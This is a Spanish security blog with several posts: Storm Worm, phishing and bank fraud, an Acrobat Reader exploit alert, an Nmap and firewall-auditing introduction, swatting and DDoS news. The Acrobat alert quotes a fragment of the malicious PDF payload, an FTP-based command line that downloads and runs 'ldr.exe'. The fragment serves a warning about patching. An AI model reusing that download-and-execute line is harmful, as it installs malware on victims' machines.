Virus On the Wild: Storm Worm

Esta noche, es una de esas noches de las que tenemos al año, muy propensas para ir en el subject de cualquier correo electrónico, con no muy buenas intenciones.... ;)

De los virus que nos "acechan" hoy en día, una gran cantidad están orientados al robo de credenciales bancarios, mientras que hay otro tipo de virus, los menos, los llamados "románticos" los cuales persiguen otra finalidad muy diferente que la obtención de credenciales y posterior "cyber-atraco".

Uno de estos virus de difinición "romántica" está apareciendo como uno de los que posee una tasa de infección muy alta, el virus al que me refiero es Storm Worm. Dicho virus está siendo detectado con un subject en muchos de los correos adjuntos en los que va, utilizando la cobertura que da una noche como la de hoy, utilizando ingeniería social, a la vieja usanza vamos....

Información sobre el virus:

Websense

Honeyblog

S21secBlog

Que tiempos aquellos los de 29a !!!!

Asi que ojo al parche, con el bichito, porque dará curro extra a algún Admin de seguridad que conozco...!!! y a pasarlo bien, sin que os den muchos sustos....

Un abrazo grande para los "bichos" que estan evitando las infecciones del día a día...Perico, Jorghino,David....gracias por lo que me enseñasteis...especímenes mios!!

Cambio y corto!

Manos arriba!! esto es un atraco...on-line

Por un lado tenemos a....los bancos

Por mucho que nuestros bancos se empeñen en afirmar lo contrario, las gestiones que realizamos a través de la la banca electrónica no son seguras y les aplican riesgos, que no están en el lado del cliente de manera exclusiva...

Como se comenta en esta noticia

No sería mejor el dejar de echar la culpa solo a los usuarios y asumir las deficiencias propias en la seguridad?.Pero claro cuando se trata de asumir pérdidas mejor echar la culpa al usuario....y su formación en seguridad.

Y por otro lado....a los que se pasan de listos!

También están los que mediante el timo de la estampita, (phising) nos atracan on line, como dice esta noticia

Y la pregunta que me hago es...y todo este tipo de "atracos on-line" es la punta del iceberg? de cuantos casos no tenemos constancia con una solución para los afectados?

Bueno, menos mal, que nuestra seguridad ciudadana hace este tipo de eventos....les servirá de algo?....

En fin......

Alerta: Vulnerabilidades en productos Acrobat

Buenas....

A pesar de que la vulnerabilidad no es nueva, y por lo tanto hay parche y nueva versión, existen numerosos exploit´s para Acrobat Reader.

Especialmente estan siendo como no..unos archivos adjuntos en el correo electrónico el principal foco de infección, los archivos vienen como “BILL.pdf” y “INVOICE.pdf”, aunque los nombres pueden cambiar según el exploit obj<>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&” “&” “nul.bat)/S/ URI>

Los espacios en la cadena expuesta están orientado a impedir que los antivirus detecten el patrón malicioso.Por lo que una vez instalado el código malicioso, explota la vulnerabilidad, con la cual, se puede instalar un bot en la máquina como robo de credenciales, por un troyano.

Se confirma que son vulnerables: Adobe Reader 8.1 y anteriores, Adobe Reader 7.0.9 y anteriores, Adobe Acrobat Professional, 3D y Standard 8.1 y versiones anteriores, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9 y anteriores.

Aqui os pongo lo que recomienda la gente de SANS.
Parches para Acrobat Reader

Destacar que la vulnerabilidad afecta solamente a Pc´s con Windows Xp con Internet Explorer 7.0

Asi que ya sabeis....más vale prevenir....

Información sacada del Blog de Sergio Hernando

Nmap

Llegó el momento tan esperado :P

A continuación os explicaré en sucesivas entradas como utilizar esta herramienta asi pues...vamos a darle chicha al nmap...!!!!

La herramienta está hecha para trabajar en diferentes sistemas operativos, tanto en Windows como en Unix. Dentro de mis preferencias, yo la utilizo en mi distro de linux (Fedora Core 7) y me va como la seda.... y la verdad nunca me ha dado por instalarla en un "ventanas" , pero me imagino que con el uso que hace de los recursos del sistema dicho sistema operativo....se perderá en funcionalidad... :P

La herramienta la podéis decargar de aquí

Una vez que os la instalais, sorpresa!!! no tiene iterfaz gráfica de usuario (GUI) funciona por comandos!!! asi que el que quiera pescar peces que se moje el culo!!!

Me consta que hay GUI para diferentes sistemas operativos, yo por lo que he visto de la interfaz gráfica es que le resta a la herramienta potencia, puesto que no la puedes configurar con todos los parámetros que tiene...asi que ha "comandear"

Lo dicho una vez instalada, tenemos que iniciar una shell ya sea a través de Ms-Dos o cualquier teminal de Unix.

Una vez iniciado el modo terminal:

1. Escribimos nmap

Y vemos las opciones que nos da la herramienta, así que lo que toca, es echarse un vistazo a las opciones porque mañana hablaré de ellas....

Cambio y corto!

SWATting or swatting

Hasta los de azul pillan..

El jueves 18 de Octubre fue detenido un chaval de 19 años, como en los EE.UU, acusado de realizar un ataque denominado "SWATting or swatting".

Dicho ataque consta en spoofear el número de teléfono de tu víctima, para posteriormente llamar a los "Swat" y dar la falsa alarma de que en tu casa o en otro sitio pasa algo grave...

Al angelito no se lo ocurrió otra cosa que, llamar a los que primeros disparan y luego preguntan...aunque por ese país yo creo que todos actuan igual, sea los hombres de azul, gris o morado...

La noticia la leí aquí

Eventos de Seguridad

Os informo de próximos eventos de seguridad en Madrid:

Capdesi , se ha abierto el plazo de inscripción!!! yo intentaré no perdérmelo.... el programa de las ponencias os lo dejo aqui.

Microsoft Technet Security Day

Ambos eventos son gratuitos....y tal como está el euribor...estas cosas se agradecen!!!!

Free Software

He descubierto un programa muy parecido a uno que os puse en un una entrada antigua.Dicho programa, lo que hace es verificar dentro de los programas instalados en tu sistema operativo, el estado de las actualizaciones de los mismos. También tiene un servicio de news, donde se publican las diferentes actualizaciones de los 80.000 programas que soporta la aplicación.

Está en fase beta, y como sabeis, un programa que no esté actualizado, puede dar problemas tanto a nivel de sistema operativo como a nivel de seguridad.... ;)

Para descargar pulsa aquí

Nueva versión de Firefox 2.0.0.8

El viernes 19 se ha lierado la nueva versión del navegador Mozilla Firefox 2.0.0.8. Esta nueva versión soluciona 8 vulnerabilidades, de las cuales 2 son consideradas críticas...

A parte, uno de los cambios que se recoge en esta nueva versión, es el tratamiento de determinadas URL´s maliciosas para sistemas operativos Windows XP. Como la solución a "cuelgues" del nevegador.

Pulsa aquí para descargarlo

Regresé...!!!

Buenas a todos/as

Despues de una semana "infernal" que he sufrido para la preparación de un examen que tuve, vuelvo a estar on-line para refrescar los contenidos del blog....

Temas pendientes:

• Nmap
  
• Tratar nuevas publicaciones que tengo en el tintero....

Cambio y corto!!!

Para el finde...

Lecturas recomendadas...

Discos duros híbridos, acceder al disco duro sin encender el Pc
Death Master
Auditando Mainframes

No todo tiene que ser informatica...

Los reyes del mambo...
Obey

Auditando Firewalls: NMAP

Seguimos con la auditorá de firewalls, y esta vez toca hacer una introducción al todopoderoso NMAP.

Esta herramienta, posiblemente sea la mejor, por no decir que es el mejor scanner de puertos que existe, ya que lo tiene todo:

• Es gratuita
• La capacidad que tiene la herramienta por si misma.
• Existe versión para Windows como para diferentes versiones de Unix.
• La amplia información existente en la red para su uso

Que es NMAP?

Nmap es una herramienta que sirve para scannear puertos con una cantidad de parámetros impresionantes, tanto para los diferentes tipos de scanneo, como los métodos soportados para crear determinados paquetes.

Para que se usa?

El uso que se da a esta herramienta, es para ver que puertos tiene publicados un host y el estado de los mismos (open/close/filter).

Traduzco...;) En entradas anteriores, hemos hablado de la función de un firewall, y los diferentes tipos existentes en el mercado. Desde un punto de vista de un usuario doméstico nuestro firewall personal nos está monotorizando continuamente las conexiones y nuestro equipo estaría protegido.

Y yo os pregunto ahora, sabeis que puertos teneis publicados por el firewall y el estado de estos puertos?. En otras palabras pensais que vuestro firewall hace su trabajo?.Nmap es la herramienta que nos va a mostrar como trabaja nuestro firewall para protegernos de conexiones no deseadas ;)

Cuando se inicia un ataque a nivel de red, es fundamental conocer si un host está "vivo" y si dicho host tiene puertos publicados, para saber que tipo de servicios están detrás de esos puertos abiertos... :P

Cada vez que hago una auditoria de una instalación de un firewall realizo un scanneo de puertos para ver si ha sido bien configurado, es decir verificar que puertos están publicados a internet y el estado de los mismos ya que las sorpresas en seguridad implican....posibles ataques

En la siguiente entrada entraremos en "materia", explicando el uso de la herramienta y como interpretar los resultados que nos muestra.

Dedicado a los "admin" de firewalls en especial a uno de ellos de quien hoy es su santo...que por cierto... a ver si se anima a publicar alguna entrada...:P guapa!!!AlucarD!!!!!

Niña cierra los puertos...que te entran los barcos!!! ;))))

Free Software

Os pongo el enlace a un software, gratuito de la gente de Secunia, el programa, que es para plataformas Micro$oft verifica si los programas instalados, están actualizados a la última versión y al corriente de los parches que los fabricantes han liberado.

Os servirá para ver evitar males mayores con los programas que teneis instalados y sus bug

Para descargar pincha aqui

Noticia: Ataque DDoS

Buenas a todos/as

Me hago eco de una noticia que he leido en securityfocus, sobre un ataque llevado a cabo contra una web.

Dicho ataque ha consistido en crear una denegación de servicio (DoS), para que la web en cuestíon no estuviera disponible. El autor de 21 años de edad, tenía bajo su "mando" una botnet de nada menos que 7000 máquinas.....que mounstro el tío....

Claro, el tío SAM dió buena cuenta de ello deteniendo al personaje en cuestión.....

Con una noticia así, quiero daros a entender de que consta un DDoS , sus consecuencias y aplicarlo a la auditoria de firewalls que estamos llevando a cabo.

Como sabeis en capítulos anteriores, en las auditorias de firewall, hemos hablado de que una de las cosas que hace un firewall es bloquear conexiones, cerrando puertos para que no estén disponibles en internet. Pero que pasa si tenenemos un servidor web? ( puerto:80/ TCP) , pues que en el firewall, el puerto asociado al servicio debe de estar abierto, para que el público de internet pueda conectarse y desde su navegador ver el contenido de ese servidor.Ya que si cerramos el puerto asociado al servicio Http, no podremos publicar ninguna web y por lo tanto no dar ningún servicio, vamos que es como el que tiene hambre y se arrasca la barriga...

Ahora bien, nos encontramos que si tenemos un servicio publicado por internet como puede ser un servidor Http, con su puerto correspondiente ( Puerto: 80/TCP) abierto para tener acceso desde cualquier navegador, también está accesible, para "inundarlo" a peticiones, y crear una denegación del servicio.

Como veis un firewall no soluciona todos los problemas de seguridad ;)

Más adelante hablaré de este tipo de ataques, como detectarlos y como remediarlos...si es que se puede...;)

Por cierto queda pendiente en la siguiente entrada el uso del todopoderoso NMAP para el scaneo de puertos que puede tener un host abiertos/cerrados detrás de un firewall.

Como siempre, al final de cada entrada se esperan comentarios.....

Tal dia como hoy....

Quiero hacer un recordatorio, al día de hoy, un 9 de Octubre....el motivo es porque tal día como hoy(hace 40 años), asesinaron al que podría ser, si hubiese sido informático, (que no médico) el mejor hacker de la historia... , quiero recordar a Ernesto Guevara de la Serna..."Che"

Personajes como este, hacen que se mueva el mundo, y que nos hagan ver las cosas desde otro punto de vista....

Hasta la victoria siempre!

El regreso de...Auditando Firewalls

Buenas a todos, después de una semana de inactividad en el Blog, vuelvo a la carga...y curiosidades de la vida, vengo de vuelta de auditar un Firewall empresarial...la semana fue productiva....

No quiero empezar sin dedicar esta entrada al agente de Vitoria, que me han puesto las cosas muyyyyyy fáciles para poder currar, y como no a mi inestimable "GPS" con patas, que me guió tan bien por el maravilloso mundo de los pinchos....de lo que viene siendo Euskadi, si podéis, pasaros a conocerlo es una chulada.....

Y una vez cumplidas las dedicatorias, vamos al tajo....

Hay una frase que siempre aplico a una buena configuración de un Firewall, "niña cierra los puertos que te entran los barcosssss".

Y esto que quiere decir?, a lo que me refiero con esa frase, es que una de las funciones importante por no decir las más importante en un Firewall es cerrar los puertos que publica nuestro S.O, asi pues, si nuestro Pc, no necesitase enviar correo, deberiamos configurar nuestro Firewall, para que este puerto en concreto el 25 aparezca cerrado, y no admita ninguna conexión desde Internet no deseada...

La máxima es, que no publiquemos puertos que no sean necesarios, porque sino...nos entrarán los barcos!!!! hasta el muelle de descarga ;)

Asi pues, como sabemos, detrás de un puerto hay un servicio, dicho servicio, si está publicado en Internet, sin restricciones de conexión, puede ser vulnerable...Porque, aunque vuestro sistema este parcheado 100% y ese servicio no tenga bugs, siempre, repito siempre, hay una persona detrás, la cual configura ese servicio, sea, Administrador de sistemas, o un usuario casero....y por lo tanto, cabe la posibilidad de que haya un error de configuración, como veis la seguridad 100% es imposible...

Para un usuario malintencionado, lo primero que busca en una máquina a atacar, es un puerto abierto, y una vez que descubre ese puerto abierto, busca la versión del servicio publicado e intenta atacar, con la información recibida...(versión del S.O, versión del servicio publicado, ya sea FTP, SMTP etc...) ya sabeis la información es poder...

En la próxima entrada aprenderemos a manejar alguna herramienta por no decir la "herramienta" de scanneos de puertos, el todo poderoso NMAP, larga vida NMAP....los que van a scannear te saludan!